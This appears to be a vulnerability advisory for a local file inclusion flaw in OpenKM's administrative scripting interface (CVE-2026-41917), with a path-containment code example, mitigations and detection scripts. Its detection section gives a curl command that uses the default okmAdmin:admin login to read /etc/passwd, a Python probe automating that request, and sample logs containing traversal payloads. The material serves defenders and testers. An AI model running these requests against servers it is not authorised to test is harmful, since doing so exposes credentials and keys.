CVE-2026-41917
Deferred - Pending Action
Local File Inclusion in OpenKM 6.3.12 via Scripting Interface

Publication date: 2026-05-26

Last updated on: 2026-05-26

Assigner: VulnCheck

Description
OpenKM 6.3.12 contains a local file inclusion vulnerability in the administrative scripting interface at /admin/Scripting that allows authenticated administrators to read arbitrary files by supplying an attacker-controlled filesystem path through the fsPath parameter with action=Load. Attackers can exploit this to access sensitive files including /etc/passwd, configuration files containing database credentials, and JVM keystores accessible to the OpenKM process.
Meta Information
Generated: 2026-06-15
AI Q&A: 2026-05-26
EPSS Evaluated: 2026-06-14
External references: NVD, EUVD
Affected Vendors & Products (3 associated CPEs)
Vendor   Product   Version / Range
openkm   openkm    up to 7.1.47 (excluding 7.1.47)
openkm   openkm    up to 7.1.47 (including 7.1.47)
openkm   openkm    up to 6.3.12 (excluding 6.3.12)
CWE ID   Description
CWE-22   Improper Limitation of a Pathname to a Restricted Directory ("Path Traversal"): the product uses external input to construct a pathname that is intended to identify a file or directory located underneath a restricted parent directory, but does not properly neutralize special elements within the pathname that can cause it to resolve to a location outside the restricted directory.
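The CWE-22 definition above names the missing control: the requested path must be canonicalised and confined to the directory it is meant to live in. The following is an added, illustrative Python example, not OpenKM's code and not the vendor's fix. load_unsafe() mirrors the behaviour the advisory describes (the supplied fsPath is opened as-is), and load_safe() shows the containment check. The scripts/secret directory layout in demo() is constructed for the demonstration; the names load_unsafe, load_safe, resolve_inside and PathTraversalError are this example's own.

```python
"""Path containment of the kind CWE-22 requires (illustrative, not OpenKM code)."""
import os
import tempfile


class PathTraversalError(ValueError):
    """Requested path resolves outside the permitted base directory."""


def load_unsafe(fs_path: str) -> str:
    # Weak behaviour: the caller-supplied path is opened as-is, so an absolute
    # path such as /etc/passwd or a ../ sequence is honoured.
    with open(fs_path, encoding="utf-8") as fh:
        return fh.read()


def resolve_inside(base_dir: str, fs_path: str) -> str:
    """Canonical absolute path for fs_path, or PathTraversalError if it escapes base_dir.

    Relative input is taken relative to base_dir; absolute input is accepted only
    when it already lies inside base_dir. realpath() follows symlinks, so a link
    planted inside base_dir that points at /etc is rejected as well.
    """
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, fs_path))
    # commonpath compares whole path components, so a sibling such as
    # /opt/scripts-old is not mistaken for /opt/scripts the way a plain
    # str.startswith(base) check would be.
    if os.path.commonpath([base, candidate]) != base:
        raise PathTraversalError(f"{fs_path!r} resolves to {candidate}, outside {base}")
    return candidate


def load_safe(base_dir: str, fs_path: str) -> str:
    with open(resolve_inside(base_dir, fs_path), encoding="utf-8") as fh:
        return fh.read()


def demo() -> dict:
    """Run both loaders against a constructed layout and return what each allowed."""
    results = {}
    with tempfile.TemporaryDirectory() as root:
        base = os.path.join(root, "scripts")
        sibling = os.path.join(root, "scripts-old")   # shares the prefix "scripts"
        os.makedirs(base)
        os.makedirs(sibling)
        secret = os.path.join(root, "db.properties")  # stands in for a config with DB credentials
        with open(os.path.join(base, "hello.bsh"), "w", encoding="utf-8") as fh:
            fh.write('print("hello");\n')
        with open(os.path.join(sibling, "old.bsh"), "w", encoding="utf-8") as fh:
            fh.write("// retired script\n")
        with open(secret, "w", encoding="utf-8") as fh:
            fh.write("db.password=hunter2\n")

        results["inside"] = load_safe(base, "hello.bsh")
        # The unconfined loader hands back the secret for an absolute path.
        results["unsafe_reads_secret"] = load_unsafe(secret) == "db.password=hunter2\n"

        attempts = {
            "absolute": secret,
            "traversal": "../db.properties",
            "prefix_sibling": "../scripts-old/old.bsh",
        }
        for label, requested in attempts.items():
            try:
                load_safe(base, requested)
                results[label] = "allowed"
            except PathTraversalError:
                results[label] = "blocked"
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The check is done on the resolved path rather than on the raw string, so URL decoding, mixed separators and symlinks are all handled before the comparison, and the comparison itself is component-wise so a prefix collision cannot slip through.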
Mitigation Strategies

As an immediate step, restrict access to the administrative scripting interface to the smallest set of trusted administrators; the flaw is only reachable with an administrator session.

Change default or weak administrative credentials to strong, unique passwords; the default okmAdmin:admin account is widely known and is the most likely way an outsider reaches the affected interface.

Disable or restrict the use of the /admin/Scripting interface if it is not required for daily operations.

Monitor and audit administrative access logs for suspicious activity, in particular requests to /admin/Scripting with action=Load whose fsPath value (after URL decoding) is an absolute path, contains ".." components, or otherwise points outside the expected script location.

Apply vendor patches or updates once released; at the time of publication no official patch is listed.

Implement network-level controls such as firewall or reverse-proxy rules so that the OpenKM administrative interface is reachable only from administrative networks.

Use compensating controls such as multi-factor authentication for administrative accounts.

If an administrator account may have been misused, treat the database credentials held in configuration files and any keystores readable by the OpenKM process as exposed, and rotate them.

Executive Summary

CVE-2026-41917 is a local file inclusion vulnerability found in OpenKM version 6.3.12 and related Professional Editions. It exists in the administrative scripting interface at the /admin/Scripting endpoint. Authenticated administrators can exploit this flaw by manipulating the fsPath parameter with the action=Load command to read arbitrary files on the server.

This vulnerability allows attackers to access sensitive files such as /etc/passwd, configuration files containing database credentials, and JVM keystores accessible to the OpenKM process. Exploitation requires administrative authentication but can lead to significant information disclosure.

Impact Analysis

Exploiting this vulnerability leads to unauthorized disclosure of information stored on the OpenKM server. An attacker can read system files such as /etc/passwd, configuration files carrying database credentials, and keystores accessible to the OpenKM process. Database credentials give direct access to the backing database, and keystore material may include TLS or signing private keys, so the disclosure can enable lateral movement and, combined with other weaknesses, full system compromise.

The scripting interface is an administrator-only console for running server-side scripts, so an account that can reach it is already highly privileged; the defect is that the Load action accepts an arbitrary filesystem path rather than one confined to the intended script location. In practice the risk comes from attackers who obtain administrator credentials, for example through the known default credentials, credential reuse or phishing, and then use this flaw to harvest secrets that can be chained with other vulnerabilities to take over the system.

Detection Guidance

This vulnerability can be confirmed by checking whether the administrative scripting interface at /admin/Scripting is reachable and whether the fsPath parameter with action=Load returns the contents of a file outside the expected script location, for example /etc/passwd.

Proof-of-concept exploits and detection templates, including Nuclei templates, are available to automate detection.

A Python-based proof-of-concept tool exists that validates the vulnerability by attempting to read sensitive files such as /etc/passwd.

Since the exploit requires authentication, testing can be done using default or known administrative credentials (default: okmAdmin:admin).

  • Use curl or a similar tool to send an authenticated request to the endpoint, for example:
    curl -u okmAdmin:admin 'http://<target>/admin/Scripting?action=Load&fsPath=/etc/passwd'
    The -u flag sends HTTP Basic credentials; if the admin console is protected by a form login instead, authenticate first and replay the request with the resulting session cookie. A response body containing passwd-format lines (root:x:0:0:...) confirms the file read.
  • Use the Python proof-of-concept tool from the exploit repository to automate detection.
  • Use the Nuclei scanner with the available detection templates to scan for this vulnerability.
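The steps above (send the authenticated Load request, recognise /etc/passwd in the reply) and the log-monitoring advice under Mitigation Strategies can be scripted with the standard library alone. The following is an added example and is not the Python proof-of-concept or the Nuclei template referred to above. It assumes, as the advisory states, that /admin/Scripting takes action and fsPath as query parameters and that the loaded file comes back as text in the response body; the access-log lines (combined log format) and the HTML body are constructed for this example and are not captured from a real host; host names and credentials are placeholders. The function names build_probe, looks_like_passwd, probe and suspicious_requests are this example's own.

```python
"""Detection helpers for the Load/fsPath check (added example, stdlib only)."""
import base64
import re
import urllib.error
import urllib.parse
import urllib.request

# One passwd(5) entry: 7 colon-separated fields with numeric uid and gid.
PASSWD_ENTRY = re.compile(
    r"(?m)^[ \t]*([A-Za-z0-9_.-]+:[^:\n]*:\d+:\d+:[^:\n]*:[^:\n]*:[^:\n]*)[ \t]*$"
)
# Apache/Tomcat "combined" access log: ip ident user [time] "METHOD target PROTO" status ...
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)


def build_probe(base_url: str, fs_path: str = "/etc/passwd") -> str:
    """URL for the action=Load request, with fsPath URL-encoded."""
    query = urllib.parse.urlencode({"action": "Load", "fsPath": fs_path})
    return f"{base_url.rstrip('/')}/admin/Scripting?{query}"


def looks_like_passwd(body: str) -> bool:
    """True if the body carries at least two passwd entries and one of them is root."""
    entries = PASSWD_ENTRY.findall(body)
    return len(entries) >= 2 and any(e.startswith("root:") for e in entries)


def probe(base_url, username, password, fs_path="/etc/passwd", timeout=10, cookie=None):
    """Send the authenticated GET and return (status, file_contents_detected).

    HTTP Basic mirrors the curl -u example; if the admin console sits behind a
    form login, pass the session cookie string and it is sent as well.
    """
    req = urllib.request.Request(build_probe(base_url, fs_path))
    token = base64.b64encode(f"{username}:{password}".encode()).decode()
    req.add_header("Authorization", f"Basic {token}")
    if cookie:
        req.add_header("Cookie", cookie)
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, looks_like_passwd(resp.read().decode("utf-8", "replace"))
    except urllib.error.HTTPError as err:
        return err.code, False


def _fully_decoded(value: str) -> str:
    # Undo repeated percent-encoding (..%252F.. and similar) up to a few rounds.
    for _ in range(3):
        decoded = urllib.parse.unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_requests(log_lines) -> list:
    """Flag action=Load requests whose fsPath is absolute or climbs with '..'.

    Legitimate use should name a file inside the scripts location, so a rooted
    path or any '..' component (checked after decoding) is reported.
    """
    hits = []
    for line in log_lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        url = urllib.parse.urlsplit(m.group("target"))
        if not url.path.endswith("/admin/Scripting"):
            continue
        params = urllib.parse.parse_qs(url.query)
        if params.get("action", [""])[0] != "Load":
            continue
        for raw in params.get("fsPath", []):
            fs_path = _fully_decoded(raw)
            rooted = fs_path.startswith("/") or re.match(r"[A-Za-z]:[\\/]", fs_path) is not None
            if rooted or ".." in re.split(r"[\\/]+", fs_path):
                hits.append({"ip": m.group("ip"), "time": m.group("ts"),
                             "status": int(m.group("status")), "fsPath": fs_path})
    return hits


# Constructed sample data for this example, not captured from a real system.
SAMPLE_LOG = """\
203.0.113.7 - - [26/May/2026:10:02:11 +0000] "GET /OpenKM/admin/Scripting?action=Load&fsPath=/etc/passwd HTTP/1.1" 200 2417 "-" "curl/8.5.0"
203.0.113.7 - - [26/May/2026:10:02:40 +0000] "GET /OpenKM/admin/Scripting?action=Load&fsPath=..%2F..%2FOpenKM.cfg HTTP/1.1" 200 1930 "-" "curl/8.5.0"
198.51.100.20 - - [26/May/2026:10:05:03 +0000] "GET /OpenKM/admin/Scripting?action=Load&fsPath=hello.bsh HTTP/1.1" 200 311 "-" "Mozilla/5.0"
198.51.100.20 - - [26/May/2026:10:05:30 +0000] "GET /OpenKM/admin/Scripting HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""
SAMPLE_BODY = ("<html><body><pre>\nroot:x:0:0:root:/root:/bin/bash\n"
               "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
               "openkm:x:1001:1001::/opt/openkm:/bin/bash\n</pre></body></html>")

if __name__ == "__main__":
    print(build_probe("http://openkm.example.test:8080/OpenKM"))
    print("sample body looks like passwd:", looks_like_passwd(SAMPLE_BODY))
    for hit in suspicious_requests(SAMPLE_LOG.splitlines()):
        print(hit)
```

probe() is the only function that touches the network and is the one to point at a lab instance; the fingerprint and the log scanner run offline, and the scanner decodes repeatedly so a double-encoded traversal such as %252e%252e%252f is not missed.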
Compliance Impact

The vulnerability in OpenKM 6.3.12 allows authenticated administrators to read arbitrary sensitive files, including configuration files containing database credentials and JVM keystores. This unauthorized access to sensitive data can lead to data breaches and exposure of confidential information.

Such exposure of sensitive information can negatively impact compliance with common standards and regulations like GDPR and HIPAA, which require strict controls over access to personal and sensitive data, as well as protection against unauthorized disclosure.

Because the vulnerability enables attackers to access sensitive files and potentially escalate privileges, organizations using affected OpenKM versions may face increased risk of non-compliance, data breaches, and associated legal or regulatory consequences.
